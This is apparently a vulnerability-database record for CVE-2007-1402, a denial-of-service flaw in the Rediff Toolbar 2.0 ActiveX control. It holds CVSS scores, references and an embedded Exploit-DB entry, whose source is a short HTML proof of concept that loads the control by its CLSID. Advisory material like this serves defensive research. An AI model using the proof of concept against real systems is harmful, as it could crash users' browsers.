ID CVE-2007-1402Type cveReporter cve@mitre.orgModified 2008-11-15T06:44:00
Description
The Rediff Toolbar 2.0 ActiveX control in redifftoolbar.dll allows remote attackers to cause a denial of service via unspecified manipulations, possibly involving improper initialization or blank arguments.
{"id": "CVE-2007-1402", "bulletinFamily": "NVD", "title": "CVE-2007-1402", "description": "The Rediff Toolbar 2.0 ActiveX control in redifftoolbar.dll allows remote attackers to cause a denial of service via unspecified manipulations, possibly involving improper initialization or blank arguments.", "published": "2007-03-10T22:19:00", "modified": "2008-11-15T06:44:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1402", "reporter": "cve@mitre.org", "references": ["http://osvdb.org/36899", "http://downloads.securityfocus.com/vulnerabilities/exploits/21924.html", "http://www.securityfocus.com/bid/21924"], "cvelist": ["CVE-2007-1402"], "type": "cve", "lastseen": "2019-05-29T18:08:58", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "fc32bc998b8dd49ce3e2c8613fc24680"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "3d23b172bc116a698e86f871c016629c"}, {"key": "cpe23", "hash": "4938f49850068cffa9b4a6d9291c5eb5"}, {"key": "cvelist", "hash": "e9653c194a6b3577d227c97399d19fb2"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "a11071654cde664199dac48330e1f990"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "2bee956e65a08de0f436e746ec6d5209"}, {"key": "href", "hash": "d61c9835bfb150f53fde2d7b2004dc74"}, {"key": "modified", "hash": "0d7e7aa257af8fe5ba2b57073bf6066b"}, {"key": "published", "hash": "1a154e406c7034c7ee2bde4ef287ecd3"}, {"key": "references", "hash": "692331ee5e1d1ac62053b96e5b549958"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "92e968a09e1107e43f2b495b7ee4ad74"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "087f2f9f402b2e4254a98433b453a57e422fa3230c69f2b4e0039deede61340b", "viewCount": 0, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2019-05-29T18:08:58"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:3433"]}, {"type": "osvdb", "idList": ["OSVDB:36899"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6984"]}], "modified": "2019-05-29T18:08:58"}, "vulnersScore": 6.7}, "objectVersion": "1.3", "cpe": ["cpe:/a:rediff:toolbar:2.0"], "affectedSoftware": [{"name": "rediff toolbar", "operator": "eq", "version": "2.0"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": true, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:rediff:toolbar:2.0:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}
{"exploitdb": [{"lastseen": "2016-01-31T18:28:39", "bulletinFamily": "exploit", "description": "Rediff Toolbar ActiveX Control Remote Denial of Service Exploit. CVE-2007-1402. Dos exploit for windows platform", "modified": "2007-03-08T00:00:00", "published": "2007-03-08T00:00:00", "id": "EDB-ID:3433", "href": "https://www.exploit-db.com/exploits/3433/", "type": "exploitdb", "title": "Rediff Toolbar ActiveX Control Remote Denial of Service Exploit", "sourceData": "<!--\n Rediff Toolbar ActiveX Control Remote DOS Vulnerability\n By Umesh Wanve (umesh_345@yahoo.com)\n\nReference: http://www.securityfocus.com/bid/21924\n\nDate: 08- Jan - 2007\n\n// CLSID: {12F02779-6D88-4958-8AD3-83C12D86ADC7}\n// Info: Rediff Toolbar\n// ProgID: XBTB00001.XBTB00001.1\n// InprocServer32: Program Files\\\\Rediff Toolbar\\\\2.0\\\\redifftoolbar.dll\n\n--!>\n\n\n<html>\n\n<body>\n<OBJECT id=\"test\" WIDTH=445 HEIGHT=40 classid=\"clsid:12F02779-6D88-4958-8AD3-83C12D86ADC7\" >\n</OBJECT>\n\n<script language=\"vbscript\">\n\n\n</script>\n\n</body>\n</html>\n\n# milw0rm.com [2007-03-08]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3433/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[CVE-2007-1402](https://vulners.com/cve/CVE-2007-1402)\nBugtraq ID: 21924\n", "modified": "2007-01-08T03:39:06", "published": "2007-01-08T03:39:06", "href": "https://vulners.com/osvdb/OSVDB:36899", "id": "OSVDB:36899", "title": "Rediff Toolbar ActiveX (redifftoolbar.dll) Unspecified Remote DoS", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:22", "bulletinFamily": "software", "description": "ActiveX element allow to upload and execute any code.", "modified": "2006-12-31T00:00:00", "published": "2006-12-31T00:00:00", "id": "SECURITYVULNS:VULN:6984", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:6984", "title": "Rediff Bol Downloader ActiveX code download and execution", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
